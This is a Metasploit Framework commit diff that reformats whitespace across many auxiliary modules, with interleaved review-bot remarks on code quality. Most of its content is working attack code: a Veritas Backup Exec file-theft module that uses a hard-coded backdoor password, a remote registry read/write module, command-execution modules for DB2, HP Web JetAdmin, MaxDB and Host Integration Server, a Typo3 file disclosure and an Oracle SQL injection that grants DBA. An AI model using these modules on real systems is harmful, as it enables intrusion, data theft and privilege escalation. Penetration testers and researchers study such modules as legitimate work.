
big module whitespace/formatting cleanup pass

git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da
Joshua Drake 2010-04-30 08:40:19 +00:00
parent 54725099d5
commit 0ea6eca4bc
676 changed files with 10698 additions and 10697 deletions


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,13 +18,13 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::NDMP
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote File Access',
'Description' => %q{
This module abuses a logic flaw in the Backup Exec Windows Agent to download
arbitrary files from the system. This flaw was found by someone who wishes to
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
listed in the references section. To transfer an entire directory, specify a
path that includes a trailing backslash.
},
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'References' =>
[
['OSVDB', '18695'],
['OSVDB', '18695'],
['BID', '14551'],
['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
],
@ -43,44 +43,44 @@ class Metasploit3 < Msf::Auxiliary
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptAddress.new('LHOST',
OptAddress.new('LHOST',
[
false,
"The local IP address to accept the data connection"
]
),
OptPort.new('LPORT',
OptPort.new('LPORT',
[
false,
"The local port to accept the data connection"
]
),
OptString.new('RPATH',
[
),
OptString.new('RPATH',
[
true,
"The remote filesystem path to download",
"The remote filesystem path to download",
"C:\\boot.ini"
]
),
OptString.new('LPATH',
[
OptString.new('LPATH',
[
true,
"The local filename to store the exported data",
"The local filename to store the exported data",
"backupexec_dump.mtf"
]
),
),
], self.class)
end
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
lfd = File.open(datastore['LPATH'], 'w')
connect
data = ndmp_recv()
if (not data)
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
username = "root"
password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
#
# Authenticate using the backdoor password
#
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
username,
password
].pack('NNNNNNNNA*A*')
print_status("Sending magic authentication request...")
ndmp_send(auth)
data = ndmp_recv()
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our authentication request")
disconnect
return
end
end
#
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Auxiliary
sfd = Rex::Socket.create_tcp_server(
'LocalPort' => datastore['LPORT']
)
local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
local_port = sfd.getsockname[2]
#
# Create the DATA_CONNECT request
#
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
Rex::Socket.gethostbyname(local_addr)[3],
local_port
].pack('NNNNNNNA4N')
print_status("Sending data connection request...")
ndmp_send(conn)
data = ndmp_recv()
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
sfd.close
disconnect
return
end
end
#
# Wait for the agent to connect back
@ -160,8 +160,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("Waiting for the data connection...")
rfd = sfd.accept()
sfd.close
#
# Create the Mover Set Record Size request
#
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
0,
0x8000
].pack('NNNNNNN')
print_status("Sending transfer parameters...")
ndmp_send(msrs)
data = ndmp_recv()
@ -182,18 +182,18 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our parameters request")
disconnect
return
end
end
#
# Define our tranfer parameters
#
xenv =
xenv =
[
['USERNAME', ''],
['BU_EXCLUDE_ACTIVE_FILES', '0'],
['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
]
#
# Create the DATA_START_BACKUP request
#
@ -208,26 +208,26 @@ class Metasploit3 < Msf::Auxiliary
].pack('NNNNNNN')
bkup += "dump"
bkup += [ xenv.length ].pack('N')
#
# Encode the transfer parameters
#
xenv.each do |e|
k,v = e
# Variable
bkup += [k.length].pack('N')
bkup += k
bkup += Rex::Encoder::NDR.align(k)
# Value
bkup += [v.length].pack('N')
bkup += v
bkup += Rex::Encoder::NDR.align(v)
bkup += Rex::Encoder::NDR.align(v)
end
bkup[-1, 1] = "\x01"
print_status("Sending backup request...")
ndmp_send(bkup)
data = ndmp_recv()
@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary
disconnect
return
end
#
# Create the GET_ENV request
#
@ -246,7 +246,7 @@ class Metasploit3 < Msf::Auxiliary
0,
0x4004,
0,
0
0
].pack('NNNNNN')
print_status("Sending environment request...")
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Auxiliary
print_error("Did not receive a response to our environment request")
disconnect
return
end
#
end
#
# Start transferring data
#
print_status("Transferring data...")
bcnt = 0
begin
while (data = rfd.get_once)
bcnt += data.length
@ -271,13 +271,13 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::EOFError
end
lfd.close
rfd.close
print_status("Transferred #{bcnt} bytes.")
disconnect
end
end
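Review bot: The dump file opened at `lfd = File.open(datastore['LPATH'], 'w')` is never closed on the early-return paths that follow (`disconnect` then `return` after the authentication, data-connection, parameters and environment requests only tear down the socket), so a failed run leaks the handle and leaves an empty `.mtf` file behind. Since nothing is written until the transfer loop, the simplest fix is to move the open to just before `print_status("Transferring data...")`, or to wrap the body in `begin ... ensure lfd.close end`. The `run` method is split across several hunks here, so parts of its body are not visible in this view.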


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
include ::Rex::Platforms::Windows
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Veritas Backup Exec Server Registry Access',
'Description' => %q{
This modules exploits a remote registry access flaw in the BackupExec Windows
Server RPC service. This vulnerability was discovered by Pedram Amini and is based
on the NDR stub information information posted to openrce.org.
on the NDR stub information information posted to openrce.org.
Please see the action list for the different attack modes.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
@ -42,16 +42,16 @@ class Metasploit3 < Msf::Auxiliary
['System Information'],
['Create Logon Notice']
],
'DefaultAction' => 'System Information'
'DefaultAction' => 'System Information'
))
register_options(
[
Opt::RPORT(6106),
OptString.new('WARN',
[
OptString.new('WARN',
[
false,
"The warning to display for the Logon Notice action",
"The warning to display for the Logon Notice action",
"Compromised by Metasploit!\r\n"
]
),
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
end
def auxiliary_commands
return {
return {
"regread" => "Read a registry value",
# "regenum" => "Enumerate registry keys",
}
@ -73,15 +73,15 @@ class Metasploit3 < Msf::Auxiliary
logon_notice()
end
end
def cmd_regread(*args)
if (args.length == 0)
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
return
end
paths = args[0].split("\\")
hive = paths.shift
subval = paths.pop
@ -97,12 +97,12 @@ class Metasploit3 < Msf::Auxiliary
end
def cmd_regenum(*args)
if (args.length == 0)
print_status("Usage: regenum HKLM\\\\Software")
return
end
paths = args[0].split("\\")
hive = paths.shift
subkey = "\\" + paths.join("\\")
@ -115,10 +115,10 @@ class Metasploit3 < Msf::Auxiliary
end
end
def system_info
print_status("Dumping system information...")
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
@ -132,14 +132,14 @@ class Metasploit3 < Msf::Auxiliary
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
print_status("The system runs on a #{deunicode(cpu)}")
end
def logon_notice
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
end
def deunicode(str)
str.gsub(/\x00/, '').strip
end
@ -149,9 +149,9 @@ class Metasploit3 < Msf::Auxiliary
#
def backupexec_regwrite(hive, subkey, subval, type, data)
stub = backupexec_regrpc_write(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type,
:data => data
)
@ -159,15 +159,15 @@ class Metasploit3 < Msf::Auxiliary
return false if resp.length == 0
return true
end
#
# Read a registry key
#
def backupexec_regread(hive, subkey, subval, type = REG_SZ)
stub = backupexec_regrpc_read(
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:hive => registry_hive_lookup(hive),
:subkey => subkey,
:subval => subval,
:type => type
)
resp = backupexec_regrpc_call(4, stub)
@ -184,40 +184,40 @@ class Metasploit3 < Msf::Auxiliary
#
def backupexec_regenum(hive, subkey)
stub = backupexec_regrpc_enum(
:hive => registry_hive_lookup(hive),
:hive => registry_hive_lookup(hive),
:subkey => subkey
)
resp = backupexec_regrpc_call(7, stub)
p resp
return nil if resp.length == 0
ret, len = resp[0,8].unpack('VV')
return nil if ret == 0
return nil if len == 0
return resp[8, len]
end
#
# Call the backupexec registry service
#
#
def backupexec_regrpc_call(opnum, data = '')
handle = dcerpc_handle(
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
'ncacn_ip_tcp', [datastore['RPORT']]
)
dcerpc_bind(handle)
resp = dcerpc.call(opnum, data)
outp = ''
if (dcerpc.last_response and dcerpc.last_response.stub_data)
outp = dcerpc.last_response.stub_data
end
disconnect
outp
end
@ -261,11 +261,11 @@ class Metasploit3 < Msf::Auxiliary
hive = opts[:hive] || HKEY_LOCAL_MACHINE
type = opts[:type] || REG_SZ
data = opts[:data] || ''
if (type == REG_SZ || type == REG_EXPAND_SZ)
if (type == REG_SZ || type == REG_EXPAND_SZ)
data = Rex::Text.to_unicode(data+"\x00")
end
stub =
NDR.UnicodeConformantVaryingString(subkey) +
NDR.UnicodeConformantVaryingString(subval) +
@ -279,5 +279,5 @@ class Metasploit3 < Msf::Auxiliary
NDR.long(hive)
return stub
end
end
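Review bot: `p resp` in `backupexec_regenum` is a leftover debug dump that writes the raw RPC stub bytes to stdout on every call, bypassing the module's `print_*` output path; it should be removed, or at most become `print_status(resp.inspect)` behind a verbose check. The rest of the method reads `ret, len = resp[0,8].unpack('VV')` and returns `resp[8, len]`, which is fine for a non-empty response but trusts the server-supplied `len` without bounding it against `resp.length`; a short response simply yields a truncated string, which callers should expect.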


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
'Description' => %q{
This module tests for a logic vulnerability in the Cisco VPN Concentrator


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability.',
'Description' => %q{
This module exploits a vulnerability in the Remote Command Server
@ -31,12 +35,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Mar 4 2004'))
register_options(
register_options(
[
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
], self.class )
], self.class )
end
def run
@ -46,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
# Connect with a valid user/pass. if not, then bail.
# Connect with a valid user/pass. if not, then bail.
begin
smb_login()
rescue ::Exception => e
@ -54,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
disconnect
return
end
# Have it so our command arg is convenient to call.
# Have it so our command arg is convenient to call.
rcmd = datastore['CMD']
print_status("Connecting to named pipe \\DB2REMOTECMD...")
@ -84,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
# Read from the pipe and give us the data.
res = pipe.read()
puts res
# Close the named pipe and disconnect from the socket.
pipe.close
pipe.close
disconnect
end
end


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'May 27 2008'))
register_options(
register_options(
[
Opt::RPORT(3000),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
data = "\x75" + datastore['CMD']
pad = "\x00" * 512
pkt = data + pad
print_status("Sending command: #{datastore['CMD']}")
pkt = data + pad
print_status("Sending command: #{datastore['CMD']}")
sock.put(pkt)
# try to suck it all in.
sleep(5)
res = sock.get_once
res.each do |info|
puts "[*] #{info.gsub(/[^[:print:]]+/,"")}" # hack.
end
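Review bot: `res = sock.get_once` can return nil when the service sends nothing back within the timeout, and the following `res.each do |info|` then raises NoMethodError instead of reporting a failed command; add `return print_error("No response from the service") unless res` before the loop. The loop also relies on `String#each`, which exists on the Ruby of this era but not on 1.9 and later, so `res.each_line` would be the safer spelling. The enclosing `run` method starts before this hunk.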


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -31,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'May 27 2008'))
register_options(
register_options(
[
Opt::RPORT(3500),
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
@ -43,17 +47,17 @@ class Metasploit3 < Msf::Auxiliary
data = "\x75" + datastore['CMD']
pad = "\x00" * 512
pkt = data + pad
pkt = data + pad
# commands are executed blindly.
print_status("Sending command: #{datastore['CMD']}")
print_status("Sending command: #{datastore['CMD']}")
sock.put(pkt)
sleep(1)
sock.get_once
print_status("Executed '#{datastore['CMD']}'...")
disconnect


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'HP Web JetAdmin 6.5 Server Arbitrary Command Execution',
'Description' => %q{
This module abuses a command execution vulnerability within the
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'URL', 'http://www.milw0rm.com/exploits/294' ],
],
'DisclosureDate' => 'Apr 27 2004'))
register_options(
[
Opt::RPORT(8000),


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
This module exploits a file disclosure vulnerability in the jumpUrl mechanism of
Typo3. This flaw can be used to read any file that the web server user account has
access to.
},
'Author' => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
'License' => MSF_LICENSE,
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
error_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&locationData=1:"
ju_hash = nil
res = send_request_raw({
'uri' => error_uri,
'method' => 'GET',
@ -65,24 +69,24 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.message == "OK")
res.body =~ /jumpurl Secure: Calculated juHash, ((\w)+), did not match the submitted juHash./
if $1.nil?
print_error("Error while getting juHash. Maybe the version is already patched...")
return
end
ju_hash = $1
print_status("Getting juHash from error message: #{ju_hash}")
else
print_error("No response from the server.")
return
end
file_uri = datastore['URI'] + "/index.php?jumpurl=" +datastore['RFILE'] +"&juSecure=1&type=0&juHash=#{ju_hash}&locationData=1:"
print_status("Trying to get #{datastore['RFILE']}.")
print_status("Trying to get #{datastore['RFILE']}.")
file = send_request_raw({
'uri' => file_uri,
'method' => 'GET',
@ -92,15 +96,15 @@ class Metasploit3 < Msf::Auxiliary
'Connection' => 'Close',
}
},25)
if (file and file.message = "OK")
if file.body == 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
print_error("File #{datastore['RFILE']} does not exist.")
return
end
print_status("Writing local file #{datastore['LFILE']}.")
open(datastore['LFILE'],'w') {|f| f << file.body }
open(datastore['LFILE'],'w') {|f| f << file.body }
else
print_error("Error while getting file.")
end
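Review bot: `if (file and file.message = "OK")` assigns rather than compares, so the branch is taken for any non-nil response regardless of its status; it should read `if (file and file.message == "OK")`. The line below it, `open(datastore['LFILE'],'w') {|f| f << file.body }`, goes through `Kernel#open`, which spawns a subprocess when the supplied path begins with `|`; since LFILE is an operator-controlled option, use `File.open(datastore['LFILE'], 'w') {|f| f << file.body }` so the value can only ever name a file. Both points are on visible lines; the surrounding `run` method begins before the first hunk of this file.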


@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 9 2008'))
register_options(
register_options(
[
Opt::RPORT(7210),
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
sock.put(pdbmsrv)
sock.get_once
sock.put(db_version)
ver = sock.get_once
info = ver[27,2000]
@ -69,10 +69,10 @@ class Metasploit3 < Msf::Auxiliary
#Send our command.
len = 39 + datastore['CMD'].length
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
data << "\x00\x00\x04\x00" + len.chr + "\x00\x00\x00\x65\x78\x65\x63\x5F\x73\x64"
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
data << "\x62\x69\x6E\x66\x6F\x20\x26\x26" + "#{datastore['CMD']}"
sock.put(data)
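Review bot: `len = 39 + datastore['CMD'].length` is encoded with `len.chr`, so any CMD longer than 216 bytes makes `Integer#chr` raise RangeError and the module aborts with a backtrace instead of a clear error; since the header only has one byte for the length, the honest fix is an up-front check such as `if datastore['CMD'].length > 216 then print_error("CMD must be 216 bytes or less"); return end`. On the last changed line, `"#{datastore['CMD']}"` is a redundant interpolation of a string and can be `data << datastore['CMD']`. The `run` method continues outside this hunk.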


@ -1,5 +1,9 @@
##
# This file is part of the Metasploit Framework and may be subject to
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -12,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability.',
'Description' => %q{
This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.
@ -33,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Oct 14 2008'))
register_options(
[
register_options(
[
Opt::RPORT(0),
OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
], self.class )
OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
], self.class )
end
def run
@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
if (dport == 0)
dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.0', 'ncacn_ip_tcp')
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
dport ||= dcerpc_endpoint_find_tcp(datastore['RHOST'], 'ed6ee250-e0d1-11cf-925a-00aa00c006c1', '1.1', 'ncacn_ip_tcp')
if (not dport)
print_status("Could not determine the RPC port used by the Service.")
@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Bound to #{handle} ...")
cmd = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")
print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")
begin
@ -81,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
end
disconnect
end
end
=begin


@ -1,3 +1,6 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
@ -13,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Configuration Enumerator',
@ -31,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
def run
print_status("Running MS SQL Server Enumeration...")
if mssql_login_datastore
#Get Version
print_status("Version:")
@ -42,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
print "[*]\t#{row}"
end
vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary
#checking for C2 Audit Mode
if sysconfig['c2 audit mode'] == 1
print_status("\tC2 Audit Mode is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "C2 Audit Mode is Enabled")
else
print_status("\tC2 Audit Mode is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary
#check if remote access is enabled
if sysconfig['remote access'] == 1
print_status("\tremote access is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "remote access is Enabled")
else
print_status("\tremote access is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary
#check if updates are allowed
if sysconfig['allow updates'] == 1
print_status("\tallow updates is Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
:data => "allow updates is Enabled")
else
print_status("\tallow updates is Not Enabled")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
if syslogins != nil
syslogins.each do |acc|
print_status("\t#{acc.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary
if sameasuser != nil
sameasuser.each do |up|
print_status("\t#{up.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary
if blankpass != nil
blankpass.each do |up|
print_status("\t#{up.join}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary
fountsp.each do |strp|
if dangeroussp.include?(strp.strip)
print_status("\t#{strp.strip}")
report_note(:host => datastore['RHOST'],
report_note(:host => datastore['RHOST'],
:proto => 'TCP',
:port => datastore['RPORT'],
:type => 'MSSQL_ENUM',
@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary
mssql_query(querykey)[:rows].each do |i|
instances << i[1]
end
end
end
print_status("Instances found on this server:")
instancenames = []
if instances != nil


@ -15,7 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Generic Query',
@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary
]
))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']),
], self.class)
end
def run
mssql_query(datastore['SQL'], true) if mssql_login_datastore
disconnect


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner


@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jan 13 2009'))
register_options(
register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
], self.class)
end
@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
function1 = %Q|
CREATE OR REPLACE PROCEDURE #{name1}
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
END;
|
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
fun1 = Rex::Text.encode_base64(function1)
fun2 = Rex::Text.encode_base64(function2)
prp = Rex::Text.encode_base64(prepare)
exp1 = Rex::Text.encode_base64(exploiting1)
exp2 = Rex::Text.encode_base64(exploiting2)
sql = %Q|
DECLARE
@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sql)
end
end
end


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
To do this you must firstly run smb_sniffer or smb_relay module on your sever.
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
which will connect to your SMB sever with credentials of Oracle RDBMS.
So if smb_relay is working, you will get Administrator access to server which
So if smb_relay is working, you will get Administrator access to server which
runs Oracle. If not than you can decrypt HALFLM hash.
},
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Apr 7 2009'))
register_options(
register_options(
[
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
], self.class)
end


@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Oracle Account Discovery.',
'Description' => %q{
This module uses a list of well known default authentication credentials
to discover easily guessed accounts.
